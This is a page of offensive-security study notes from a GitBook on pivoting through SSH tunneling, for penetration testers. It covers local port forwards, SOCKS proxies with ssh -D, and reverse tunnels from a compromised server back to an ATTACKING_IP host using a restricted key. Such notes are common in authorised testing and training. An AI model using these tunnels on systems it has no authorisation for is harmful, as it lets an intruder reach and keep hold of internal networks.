🟥
LSWSec - Offensive
  • Introduction
  • File transfer
    • Transferring Files
      • Transferring Files - Linux
      • Transferring Files - Windows
  • Recon
    • Passive information Gathering
      • Website
      • Finding SubDomains
        • DNS
        • DNS Zone Transfer
    • Subdomain Enumeration
    • OSINT
      • Email
      • People
      • Social Media
      • Username and Accounts
      • Passwords
      • Business
      • Image and Location
    • Active Information Gathering
      • Nmap
      • Netcat
      • ss
      • Unknown Port Scanning
      • Footprinting
        • FTP
        • SMB
        • NFS
        • DNS
    • Vulnerability Searching
  • Ports
    • 21 - FTP
    • 22 - SSH
    • 23 - Telnet
    • 25 - SMTP
    • 69 - TFTP
    • 80 - HTTP
    • 88 - Kerberos
    • 110 - Pop3
    • 111 - RPCBind
    • 119 - NNTP
    • 135 - MSRPC
    • 139/445 - SMB
      • PSExec
      • Nmap
      • Other tools
    • 143/993 - IMAP
    • 161/162 - SNMP
    • 389/636 - LDAP
    • 443 - HTTPS
    • 554 - RTSP
    • 587 - Submission
    • 631 - Cups
    • 1433 - MsSQL
    • 2049 - NFS
    • 3306 - MySQL
    • 3389 - RDP
  • Web
    • useful information
    • Web Proxy
      • Burp
    • Web Content Discovery
    • SQL
    • Web Fuzzing with FFUF
      • Directory Fuzzing
      • Domain Fuzzing
      • Paramater fuzzing
    • Local File Inclusion
      • LFI
      • Basic Bypass
    • Authentication Bypass
    • IDOR
  • Priv-esc
    • Windows
      • mimikatz
  • Pivoting
    • Info
    • Locating other machines
    • proxy
    • SSH tunneling/port forwarding
    • plink
    • socat
    • chisel
    • sshuttle
    • connecting to windows environments with a user account
  • Command and Control
    • powershell empire
    • Armitage
  • Active Directory
    • Debugging DNS
    • NTLM Authenticated Services
    • LDAP Bind Credentials
Powered by GitBook
On this page
  1. Pivoting

SSH tunneling/port forwarding

  • forward connections

    • creating a forward ssh tunnel can be done from our attacking box when we have ssh access to the target

    • most commonly done against linux servers that have ssh active and open

    • port forwarding

      • ssh -L 8000:<ip2>:80 user@<ip1> -fN

      • best for when theres an website on ip2 and you have access to ip1

      • best practice to use a high local port number

    • proxies

      • made with -D <port>

      • ssh -D <port> user@<ip> -fN

  • Reverse connections

    • preferable if you have shell on the serve but not ssh access

    • riskier as attacking machine must be accessed from the target

    • before making a connection theres a few steps to take first

      • first create a new set of ssh keys > ssh-keygen

      • copy the contents of the public key (file with .pub) and then edit ~/.ssh.authorized_keys

        • may need to create ~/.ssh and authorised_keys file

      • in the file paste

        • command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty

        • then past the public key

      • this makes sure the key can only be used for port forwarding and disallows the ability to gain a shell

    • once the first few steps are done, make sure the ssh service has started

    • now we can connect back with a reverse port forward using the following command

      • ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN

    • in newer versions of the ssh client, it is possible to create a reverse proxy with ssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN

  • to kill any of these connections type: "ps aux | grep ssh" into the terminal then find the pid, then run "sudo kill pid"

PreviousproxyNextplink

Last updated 5 months ago